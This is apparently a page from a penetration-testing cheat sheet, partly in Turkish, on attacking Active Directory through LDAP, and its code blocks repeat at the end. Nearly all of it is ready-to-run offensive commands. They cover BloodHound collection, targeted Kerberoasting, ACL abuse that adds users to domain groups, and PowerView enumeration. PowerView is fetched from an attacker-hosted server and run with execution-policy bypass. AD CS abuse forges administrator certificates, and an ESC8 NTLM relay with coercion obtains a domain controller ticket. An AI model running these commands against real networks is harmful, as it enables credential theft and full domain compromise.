LDAP (389,636)

Windapsearch

python windapsearch.py -d example.local --dc-ip 10.10.10.182 -U --full

Bloodhound

# Local Attack
.\SharpHound.exe -c All

# Remote Attack
bloodhound-python -c all -ns 172.0.0.1 -d INLANEFREIGHT.LOCAL -u administrator -p 'password123' --zip
nxc ldap 192.168.1.1 -u administrator -p 'password123' --bloodhound --collection All

# Attacker
neo4j start # neo4j:neo4j
bloodhound

MATCH (m:Computer) RETURN m 
MATCH (m:User) RETURN m
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p

Ldap Shell

ldap_shell domain.local/administrator:password123 -dc-ip 192.168.1.2

DNS Records

python dnstool.py -u 'example.com\john' -p 'pass123' --forest -a query -r '@' 192.168.1.1

Targeted Kerberoasting (GenericAll)

python targetedKerberoast.py -v -d "example.local" -u "DAMUNDSEN" -p "newP@ssword2022" --dc-ip 172.16.5.5

Tehlikeli İzinler

GenericAll: Full permissions on object
GenericWrite: Edit certain attributes on the object
WriteOwner: Change ownership of the object
WriteDACL: Edit ACE's applied to object
AllExtendedRights: Change password, reset password, etc.
ForceChangePassword: Password change for object
Self (Self-Membership): Add ourselves to for example a group
CanPSRemote : Winrm izin verir
CanRDP : RDP yapabilir


# GenericAll (Full Access)
net user john Password123 /domain
net group "Management Department" john /add /domain

runas /user:domain.local\john "cmd.exe"

Powerview

cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 .
python -m http.server 80

iwr -uri http://192.168.1.2/PowerView.ps1 -Outfile PowerView.ps1
powershell -ep bypass
Import-Module .\PowerView.ps1

Get-NetDomain # Domain Bilgisi
Get-NetUser # Bütün Kullanıcılar
Get-NetUser -SPN | select samaccountname,serviceprincipalname # SPN
Get-NetUser | select cn # Sadece cn Özelliği
Get-NetGroup # Bütün Gruplar
Get-NetComputer # Computer Objects
Find-LocalAdminAccess # Domaindeki Bilgisayarda Admin Yetkimiz Varmı
Get-NetSession -ComputerName client74 # Session Kontrolü
Get-ObjectAcl -Identity stephanie # ACE Listeleme
Find-DomainShare # Share listeleme
Find-DomainShare -CheckShareAccess # Açılan Sharelar

AD CS Zafiyetleri

./Certify.exe cas

./Certify.exe find /vulnerable

certipy-ad find -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -vulnerable

certipy-ad req -u john.doe@example.local -p password123 -upn administrator@example.local -target example.local -ca example-dc-ca -template UserAuthentication
certipy-ad auth -pfx administrator.pfx
timedatectl set-ntp off
ntpdate dc.sequel.htb
certipy-ad auth -pfx administrator.pfx

ESC8

# Relay
impacket-ntlmrelayx -t http://dc.corp.com/certsrv/certfnsh.asp -domain corp.com -smb2support --adcs --template DomainController

# Petitpotam
nxc smb 192.168.1.1 -u john -p 'pass123' -d corp.com -M coerce_plus -o LISTENER=192.168.1.2

# Get Ticket
python PKINITtools/gettgtpkinit.py corp.com/DC$ -cert-pfx DC.pfx dc.ccache
# Import Ticket
export KRB5CCNAME=dc.ccache
# Use Ticket
nxc smb 192.168.1.1 -u 'DC$' --use-kcache

PreviousKerberos (88)NextRPC WMI (135)

Last updated 2 days ago

Was this helpful?

# Local Attack .\SharpHound.exe -c All # Remote Attack bloodhound-python -c all -ns 172.0.0.1 -d INLANEFREIGHT.LOCAL -u administrator -p 'password123' --zip nxc ldap 192.168.1.1 -u administrator -p 'password123' --bloodhound --collection All # Attacker neo4j start # neo4j:neo4j bloodhound MATCH (m:Computer) RETURN m MATCH (m:User) RETURN m MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p

GenericAll: Full permissions on object GenericWrite: Edit certain attributes on the object WriteOwner: Change ownership of the object WriteDACL: Edit ACE's applied to object AllExtendedRights: Change password, reset password, etc. ForceChangePassword: Password change for object Self (Self-Membership): Add ourselves to for example a group CanPSRemote : Winrm izin verir CanRDP : RDP yapabilir # GenericAll (Full Access) net user john Password123 /domain net group "Management Department" john /add /domain runas /user:domain.local\john "cmd.exe"

cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 . python -m http.server 80 iwr -uri http://192.168.1.2/PowerView.ps1 -Outfile PowerView.ps1 powershell -ep bypass Import-Module .\PowerView.ps1 Get-NetDomain # Domain Bilgisi Get-NetUser # Bütün Kullanıcılar Get-NetUser -SPN | select samaccountname,serviceprincipalname # SPN Get-NetUser | select cn # Sadece cn Özelliği Get-NetGroup # Bütün Gruplar Get-NetComputer # Computer Objects Find-LocalAdminAccess # Domaindeki Bilgisayarda Admin Yetkimiz Varmı Get-NetSession -ComputerName client74 # Session Kontrolü Get-ObjectAcl -Identity stephanie # ACE Listeleme Find-DomainShare # Share listeleme Find-DomainShare -CheckShareAccess # Açılan Sharelar

./Certify.exe cas ./Certify.exe find /vulnerable certipy-ad find -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -vulnerable certipy-ad req -u john.doe@example.local -p password123 -upn administrator@example.local -target example.local -ca example-dc-ca -template UserAuthentication certipy-ad auth -pfx administrator.pfx timedatectl set-ntp off ntpdate dc.sequel.htb certipy-ad auth -pfx administrator.pfx

# Relay impacket-ntlmrelayx -t http://dc.corp.com/certsrv/certfnsh.asp -domain corp.com -smb2support --adcs --template DomainController # Petitpotam nxc smb 192.168.1.1 -u john -p 'pass123' -d corp.com -M coerce_plus -o LISTENER=192.168.1.2 # Get Ticket python PKINITtools/gettgtpkinit.py corp.com/DC$ -cert-pfx DC.pfx dc.ccache # Import Ticket export KRB5CCNAME=dc.ccache # Use Ticket nxc smb 192.168.1.1 -u 'DC$' --use-kcache